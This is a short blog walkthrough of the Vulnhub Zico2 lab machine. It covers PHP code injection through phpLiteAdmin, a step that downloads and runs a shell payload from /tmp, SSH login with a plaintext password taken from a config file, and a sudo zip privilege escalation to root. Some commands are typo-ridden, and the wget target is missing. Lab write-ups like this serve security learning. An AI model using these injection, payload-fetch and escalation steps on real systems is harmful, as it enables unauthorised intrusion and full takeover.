Vulnhub Zico2 Walkthrough

We start scanning the host with nmap -A -T4 -p- -vv

Dirb came with these directories

We are interested in as you can login using the default password admin

Searching search sploit for phpLiteAdmin

Now the Remote PHP Code Injection is about creating a new database with the name hack ( from the left ) and click create, choose the database we created and from the middle panel choose a name with hack ahs numbers of fields 1, click go

now name the field hack and choose typt TEXT and in the value put  <?php system(“uname -a”); ?>

Now go to to get a result from the code we’ve put

We can modify the script and use Metasploit so get a shell

Open a listening port and open a connections to your machine using:

Python –m SimpleHTTPServer 80

Now modify the scipt to be ‘<?php system (“cd /tmp;  wget; chmod +x shell; ./shell”); ?>’

Changing directories to /home/zico/wordpress an viewing config.php found a username and password and used them to login to ssh, user zico pass sWfCsfJSPV9H3AmQzw8

Running this command give us a root shell, first go to tmp folder and create any file with touch command then:

Sudo zip newfile –T –unzip-command=”sh –c /bin/bash”

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s